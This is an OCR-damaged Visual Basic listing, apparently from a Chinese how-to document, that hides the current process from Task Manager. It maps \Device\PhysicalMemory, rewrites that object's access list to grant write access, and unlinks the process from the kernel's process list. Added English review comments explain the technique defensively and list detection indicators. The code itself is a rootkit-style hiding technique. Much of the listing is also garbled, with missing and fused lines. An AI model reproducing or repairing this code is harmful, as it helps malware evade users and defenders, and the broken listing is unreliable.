vb中如何在任务管理器里面隐藏应用程序进程Word文档下载推荐.docx
' OBJ_* object-attribute flag constants.
' NOTE(review): the listing was damaged during extraction from the original
' document. Spaces are stripped, "&H.." literals are split across two lines,
' and some lines are missing or out of order, so it does not compile as shown.
' The values &H40, &H200 and &H3F2 below have lost their names; presumably
' they belong to OBJ_CASE_INSENSITIVE, OBJ_KERNEL_HANDLE and
' OBJ_VALID_ATTRIBUTES, which appear without values - confirm against the
' Windows headers.
' None of these constants is referenced by the visible code, which sets
' Attributes.Attributes to 0.
PrivateConstOBJ_PERMANENT=&
H10
PrivateConstOBJ_EXCLUSIVE=&
H20
=&
H40
&
H200
H3F2
PrivateConstOBJ_CASE_INSENSITIVE
PrivateConstOBJ_OPENIF=&
H80
PrivateConstOBJ_OPENLINK=&
H100
PrivateConstOBJ_KERNEL_HANDLE=
PrivateConstOBJ_VALID_ATTRIBUTES
' Structures and enumerations for the native-API and access-control calls
' used below: OBJECT_ATTRIBUTES, ACL, TRUSTEE, EXPLICIT_ACCESS, SE_OBJECT_TYPE.
' NOTE(review): extraction dropped every "End Type" line and most "End Enum"
' lines, and several members are fused onto one line (EXPLICIT_ACCESS, the
' SE_* list).
' UNICODE_STRING is used by OpenPhysicalMemory but is not defined anywhere in
' this listing.
PrivateTypeOBJECT_ATTRIBUTES
LengthAsLong
RootDirectoryAsLong
' Receives VarPtr() of a UNICODE_STRING in OpenPhysicalMemory.
ObjectNameAsLong
AttributesAsLong
' NOTE(review): "SecurityDeor" looks like a truncated "SecurityDescriptor".
' The same spelling is used where the field is assigned, so the two agree.
SecurityDeorAsLong
SecurityQualityOfServiceAsLong
' ACL header layout. No visible routine declares a variable of this type.
PrivateTypeACL
AclRevisionAsByte
Sbz1AsByte
AclSizeAsInteger
AceCountAsInteger
Sbz2AsInteger
' Access modes for EXPLICIT_ACCESS.grfAccessMode. Only GRANT_ACCESS is used
' in the visible code.
PrivateEnumACCESS_MODE
NOT_USED_ACCESS
GRANT_ACCESS
SET_ACCESS
DENY_ACCESS
REVOKE_ACCESS
SET_AUDIT_SUCCESS
SET_AUDIT_FAILURE
EndEnum
PrivateEnumMULTIPLE_TRUSTEE_OPERATION
NO_MULTIPLE_TRUSTEE
TRUSTEE_IS_IMPERSONATE
PrivateEnumTRUSTEE_FORM
TRUSTEE_IS_SID
TRUSTEE_IS_NAME
PrivateEnumTRUSTEE_TYPE
TRUSTEE_IS_UNKNOWN
TRUSTEE_IS_USER
TRUSTEE_IS_GROUP
' Identifies the account that an EXPLICIT_ACCESS entry applies to.
PrivateTypeTRUSTEE
pMultipleTrusteeAsLong
MultipleTrusteeOperationAsMULTIPLE_TRUSTEE_OPERATION
TrusteeFormAsTRUSTEE_FORM
TrusteeTypeAsTRUSTEE_TYPE
ptstrNameAsString
' NOTE(review): "grflnheritance" is spelled here with a lower-case L, but
' the field is assigned later as "grfInheritance". This is an OCR artefact.
PrivateTypeEXPLICIT_ACCESSgrfAccessPermissionsAsLonggrfAccessModeAsACCESS_MODEgrflnheritanceAsLong
TRUSTEEAsTRUSTEE
PrivateTypeAceArray
List()AsEXPLICIT_ACCESS
' Object kinds accepted by GetSecurityInfo/SetSecurityInfo. The visible code
' passes only SE_KERNEL_OBJECT.
PrivateEnumSE_OBJECT_TYPE
SE_UNKNOWN_OBJECT_TYPE=0SE_FILE_OBJECT
SE_SERVICE
SE_PRINTER
SE_REGISTRY_KEY
SE_LMSHARESE_KERNEL_OBJECTSE_WINDOW_OBJECT
SE_DS_OBJECTSE_DS_OBJECT_ALL
SE_PROVIDER_DEFINED_OBJECTSE_WMIGUID_OBJECT
' External API declarations from advapi32, kernel32 and, presumably, ntdll.
' NOTE(review): this section is incomplete. The routines below call
' GetSecurityInfo, SetEntriesInAcl, RtlInitUnicodeString, ZwOpenSection,
' MapViewOfFile, CloseHandle and LocalFree, but only fragments of their
' parameter lists survive here and the Declare headers are missing.
' "SetSecuritylnfo" is also spelled with a lower-case L in place of the
' capital I.
' Taken together these imports give access to kernel-object DACLs and to
' raw memory mapping, which is the capability set the rest of the module
' depends on.
PrivateDeclareFunctionSetSecuritylnfoLib
"
advapi32.dll"
(ByValHandleAsLong,ByVal
ObjectTypeAsSE_OBJECT_TYPE
ByValSecurityInfoAsLong
ppsidOwner
AsLong,ppsidGroupAsLong,ppDaclAsAny,ppSaclAsAny)AsLong
' Orphaned parameter fragments - presumably from the GetSecurityInfo and
' SetEntriesInAcl declarations.
ObjectTypeAsSE_OBJECT_TYPE,ByValSecurityInfoAsLong,ppsidOwner
Long
pListOfExplicitEntriesAs
cCountOfExplicitEntriesAsLong
EXPLICIT_ACCESS,ByValOldAclAsLong,NewAclAsLong)AsLong
' Declared but not called by any visible routine. The EXPLICIT_ACCESS fields
' are filled in by hand instead.
PrivateDeclareSubBuildExplicitAccessWithNameLib"
Alias
BuildExplicitAccessWithNameA"
(pExplicitAccessAsEXPLICIT_ACCESS,ByVal
ByValAccessModeAs
pTrusteeNameAsString,ByValAccessPermissionsAsLong
ACCESS_MODE,ByValInheritanceAsLong)
' Orphaned tails - presumably RtlInitUnicodeString, ZwOpenSection and
' MapViewOfFile.
UNICODE_STRING,ByValSourceStringAsLong)
)AsLong
dwFileOffsetLowAsLong,ByVaidwNumberOfBytesToMapAsLong
PrivateDeclareFunctionUnmapViewOfFileLib"
kernel32"
(lpBaseAddressAsAny)AsLong
' CopyMemory is an alias for RtlMoveMemory with untyped "As Any" arguments.
' Every use in this module is an unchecked raw pointer read or write.
PrivateDeclareSubCopyMemoryLib"
Alias"
RtlMoveMemory"
(DestinationAsAny
SourceAsAny,ByValLengthAsLong)
PrivateDeclareFunctionGetVersionExLib"
GetVersionExA"
(IpVersionlnformationAsOSVERSIONINFO)AsLong
' Version-information structure filled in by GetVersionEx, followed by the
' module-level state. The "End Type" line is missing from the listing.
PrivateTypeOSVERSIONINFO
dwOSVersionInfoSizeAsLong
dwMajorVersionAsLong
dwMinorVersionAsLong
dwBuildNumberAsLong
dwPlatformIdAsLong
szCSDVersionAsString*128
' Shared by HideCurrentProcess and OpenPhysicalMemory for the OS version checks.
PrivateverinfoAsOSVERSIONINFO
' Not referenced by any visible routine.
Privateg_hNtDLLAsLong
' Address of the view mapped in OpenPhysicalMemory. GetData passes it to
' LinearToPhys as the table base.
Privateg_pMapPhysicalMemoryAsLong
' Section handle returned by ZwOpenSection. HideCurrentProcess closes it.
Privateg_hMPMAsLong
' 4-byte scratch buffer used by LinearToPhys.
PrivateaByte(3)AsByte
' HideCurrentProcess - per the author's own comment below, hides the current
' application's process from the process list.
'
' What the visible code does: it reads a pointer from a fixed address, follows
' it to a second structure ("process"), reads the forward and backward links
' stored at version-specific offsets, and rewrites the two neighbouring
' entries so they link to each other. The effect is to unlink one node from a
' doubly linked list by writing straight into physical memory through the
' section opened by OpenPhysicalMemory. This is a form of direct kernel
' object manipulation.
'
' Review notes (defensive):
'  - The offsets are hard-coded and chosen only when dwPlatformId = 2,
'    dwMajorVersion = 5 and dwMinorVersion is 0 or 1. For any other version
'    they stay at 0, yet the visible code does not obviously stop.
'  - The technique depends on a user-mode process opening
'    \Device\PhysicalMemory for writing. Windows removed user-mode access to
'    that object starting with Windows Server 2003 SP1, so this is a
'    legacy-system concern.
'  - Nothing visible here synchronises with the kernel while the list
'    pointers are rewritten, and none of the reads is validated. A wrong
'    offset or a concurrent list update can corrupt kernel memory.
'  - An entry unlinked this way is missing from only one view of the system.
'    Tools that cross-check several sources (scheduler threads, handle
'    tables, window ownership) against the process list will notice the
'    mismatch.
'  - lOffsetPID is assigned but never read in the visible code.
'
' NOTE(review): the listing is extraction-damaged. "<>" is split across
' lines, the "Case 1" assignments have lost their left-hand sides, several
' "End If" lines are missing, and a number of statements are fused together.
PublicSubHideCurrentProcess()
在进程列表中隐藏当前应用程序进程
转载请注名来自爱软件()阿江编注。
DimthreadAsLong,processAsLong,fwAsLong,bwAsLong
DimlOffsetFlinkAsLong
lOffsetBlinkAsLong,lOffsetPIDAsLong
verinfo.dwOSVersionlnfoSize=Len(verinfo)
If(GetVersionEx(verinfo))<
>
0Then
Ifverinfo.dwPlatformld=2Then
Ifverinfo.dwMajorVersion=5Then
SelectCaseverinfo.dwMinorVersion
Case0
lOffsetFlink=&
HA0
lOffsetBlink=&
HA4
lOffsetPID=&
H9C
Case1
H88
H8C
H84
EndSelect
EndIf
IfOpenPhysicalMemory<
thread=GetData(&
HFFDFF124)process=GetData(thread+&
H44)fw=GetData(process+lOffsetFlink)bw=GetData(process+lOffsetBlink)SetDatafw+4,bw
SetDatabw,fw
CloseHandleg_hMPM
EndSub
' SetPhyscialMemorySectionCanBeWrited - rewrites the DACL of the section
' handle passed in so that the account named "CURRENT_USER" is granted
' SECTION_MAP_WRITE.
'
' Steps visible below: read the object's current DACL with GetSecurityInfo,
' build one GRANT_ACCESS entry, merge it into a new ACL with SetEntriesInAcl,
' apply the result with SetSecurityInfo, then LocalFree the security
' descriptor and the new ACL.
'
' Review notes (defensive):
'  - No return value is checked. dwRes is declared but never assigned in the
'    visible code, so a failed call goes unnoticed and LocalFree may be given
'    a zero pointer.
'  - The change is made on the kernel object itself and is not reverted by
'    this routine. A DACL on \Device\PhysicalMemory that grants map-write to
'    an interactive user is a useful indicator of tampering, as is an open of
'    that object with WRITE_DAC from a user-mode process.
'  - SECTION_MAP_WRITE, NO_INHERITANCE and DACL_SECURITY_INFORMATION are not
'    defined anywhere in this listing.
'
' NOTE(review): OCR has replaced several "l" characters with "i" (ByVai,
' pDaci, SetEntriesInAci, CieanUp, LocaiFree), and "End Sub" is missing.
PrivateSubSetPhyscialMemorySectionCanBeWrited(ByVaihSectionAsLong)
DimpDaciAsLong
DimpNewDaciAsLong
DimpSDAsLong
DimdwResAsLong
DimeaAsEXPLICIT_ACCESS
GetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,pDaci,0,pSD
ea.grfAccessPermissions=SECTION_MAP_WRITE
ea.grfAccessMode=GRANT_ACCESS
ea.grfInheritance=NO_INHERITANCE
ea.TRUSTEE.TrusteeForm=TRUSTEE_IS_NAME
ea.TRUSTEE.TrusteeType=TRUSTEE_IS_USER
ea.TRUSTEE.ptstrName="
CURRENT_USER"
&
vbNullChar
SetEntriesInAci1,ea,pDaci,pNewDaci
SetSecurityInfohSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,0,0,
ByVaipNewDaci,0
CieanUp:
LocaiFreepSD
LocaiFreepNewDaci
' OpenPhysicalMemory - opens the \Device\PhysicalMemory section object and
' maps one &H1000-byte view of it.
'
' Returns: the section handle (g_hMPM) when the view was mapped. Otherwise
' the function's default value of 0 is presumably returned - the failure
' paths are not visible.
'
' Steps visible below:
'  1. Build a UNICODE_STRING and OBJECT_ATTRIBUTES for the object name, with
'     all attribute flags set to 0.
'  2. Call ZwOpenSection asking for read and write mapping rights.
'  3. On STATUS_ACCESS_DENIED, reopen with READ_CONTROL or WRITE_DAC and call
'     SetPhyscialMemorySectionCanBeWrited to alter the DACL. The later reopen
'     with mapping rights is presumably in the lost lines.
'  4. Choose a file offset (&H30000 or &H39000) depending on the OS version.
'     The branch that selects between the two is missing.
'  5. Map a view with access value 4 (map-read) at that offset and keep its
'     address in g_pMapPhysicalMemory. LinearToPhys later indexes that view
'     as a table of 4-byte entries.
'
' Review notes (defensive):
'  - This is the point where the module gains raw access to physical memory.
'    On the Windows versions the code targets (major version 5) it needs an
'    account that is allowed to change the object's DACL. Windows Server 2003
'    SP1 and later refuse user-mode opens of this object.
'  - The section handle stays open in a module-level variable. The mapped
'    view in g_pMapPhysicalMemory is never unmapped in the visible code.
'
' NOTE(review): the listing is extraction-damaged. The string literal and
' both ZwOpenSection calls are split or duplicated, "<>" is broken across
' lines, and most "End If" lines are missing.
PrivateFunctionOpenPhysicalMemory()AsLong
DimStatusAsLong
DimPhysmemStringAsUNICODE_STRING
DimAttributesAsOBJECT_ATTRIBUTES
RtlInitUnicodeStringPhysmemString,StrPtr("
\Device\PhysicalMemory"
Attributes.Length=Len(Attributes)
Attributes.RootDirectory=0
Attributes.ObjectName=VarPtr(PhysmemString)
Attributes.Attributes=0
Attributes.SecurityDeor=0
Attributes.SecurityQualityOfService=0
MAP_WRITE
Attributes)
Status=ZwOpenSection(g_hMPM,SECTION_MAP_READorSECTION
Attributes)
IfStatus=STATUS_ACCESS_DENIEDThen
Status=ZwOpenSection(g_hMPM,READ_CONTROLorWRITE_DAC
SetPhyscialMemorySectionCanBeWritedg_hMPM
DimlDirectotyAsLong
If(GetVersionEx(verinfo))<
Ifverinfo.dwPlatformld
=2Then
Ifverinfo.dwMajorVersion
=5Then
lDirectoty=&
H30000
H39000
IfStatus=0Then
g_pMapPhysicalMemory
=MapViewOfFile(g_hMPM,4,0,lDirectoty,&
H1000)
Ifg_pMapPhysicalMemory
<
0ThenOpenPhysicalMemory=g_hMPM
EndFunction
' LinearToPhys - converts a virtual (linear) address to a physical address by
' walking a two-level table of 4-byte entries.
'
' Parameters:
'   BaseAddress - address of the mapped top-level table (GetData passes
'                 g_pMapPhysicalMemory).
'   addr        - the virtual address to translate.
' Returns: PAddr. No assignment to PAddr is visible for the not-present
' case, so it presumably stays at 0 there.
'
' The arithmetic is a 10/10/12-bit split: addr / 2^22 indexes the first
' level, (addr And &H3FF000) / 2^12 indexes the second level, and the low 12
' bits are the page offset. One branch instead keeps the top 10 bits of the
' entry and the low 22 bits of the address (a 4 MB page). This matches only
' 32-bit paging with 4-byte entries. NOTE(review): the layout would not hold
' with PAE enabled - confirm.
'
' The address is copied into aByte and converted through ByteArrToLong
' (which returns a Double), presumably so that addresses at or above
' &H80000000 are treated as unsigned.
'
' NOTE(review): OCR damage in this routine includes "2A22" and "2人12" for
' 2^22 and 2^12, "HFFFFFOOO" written with the letter O, a lost mask after
' "PGDEAnd<", truncated "<>" comparisons, and missing "End If" and
' "End Function" lines. None of the mapped reads is checked for a zero view
' address.
PrivateFunctionLinearToPhys(BaseAddressAsLong,addrAsLong)AsLong
DimVAddrAsLong,PGDEAsLong,PTEAsLong,PAddrAsLong
DimlTempAsLong
VAddr=addr
CopyMemoryaByte(0),VAddr,4
lTemp=Fix(ByteArrToLong(aByte)/(2A22))
PGDE=BaseAddress+lTemp*4
CopyMemoryPGDE,ByVaiPGDE,4
If(PGDEAnd1)<
0Then
lTemp=PGDEAnd<
IflTemp<
PAddr=(PGDEAnd
HFFC00000
)+(VAddrAnd
H3FFFFF)
Else
PGDE=MapViewOfFile(g_hMPM,
4,0,PGDEAnd
HFFFFF000,&
lTemp=(VAddrAnd
H3FF000)
/(2人12)
PTE=PGDE+lTemp
*4
CopyMemoryPTE,ByValPTE,4
If(PTEAnd1)<
PAddr=(PTEAnd&
HFFFFFOOO)+(VAddrAnd&
HFFF)
UnmapViewOfFilePGDE
LinearToPhys=PAddr
' GetData - reads one 4-byte value from the given virtual address by way of
' the physical-memory section.
'
' It translates addr with LinearToPhys, maps the containing &H1000-byte page
' with access value 4 (map-read), copies 4 bytes from the offset within the
' page, unmaps the view and returns the value.
'
' Review notes:
'  - A failed translation is not distinguished from a valid one. If
'    LinearToPhys yields 0, the page at physical address 0 is mapped.
'  - The test on tmp is truncated in the listing, and "End If" and
'    "End Function" are missing. "2A2" is an OCR rendering of 2^2.
PrivateFunctionGetData(addrAsLong)AsLong
DimphysAsLong,tmpAsLong,retAsLong
phys=LinearToPhys(g_pMapPhysicalMemory,addr)
tmp=MapViewOfFile(g_hMPM,4,0,physAnd&
HFFFFF000,&
H1000)
Iftmp<
ret=tmp+((physAnd&
HFFF)/(2A2))*4
CopyMemoryret,ByValret,4
UnmapViewOfFiletmp
GetData=ret
' SetData - writes one 4-byte value to the given virtual address by way of
' the physical-memory section, mapping the target page with
' SECTION_MAP_WRITE.
'
' Review notes:
'  - In the visible lines "phys" is never assigned. The LinearToPhys call
'    was presumably lost in extraction, along with the tail of the
'    MapViewOfFile call, the check on tmp, the unmap and "End Function".
'  - As shown, the function returns True unconditionally, so callers cannot
'    tell whether the write happened. HideCurrentProcess ignores the result
'    in any case.
'  - This is the module's only write primitive. Every modification of kernel
'    memory made by HideCurrentProcess goes through it.
PrivateFunctionSetData(ByValaddrAsLong,ByValdataAsLong)AsBoolean
DimphysAsLong,tmpAsLong,xAsLong
tmp=MapViewOfFile(g_hMPM,SECTION_MAP_WRITE,0,physAnd&
HFFFFF000
x=tmp+((physAnd&
HFFF)/(2a2))*4
CopyMemoryByValx,data,4
SetData=True
PrivateFunctionByteArrToLong(inByte()AsByte)AsDouble
DimiAsInteger
Fori=0To3
ByteArrToLong=ByteArrToLong+inByte(i)*(&
H100ai)
Nexti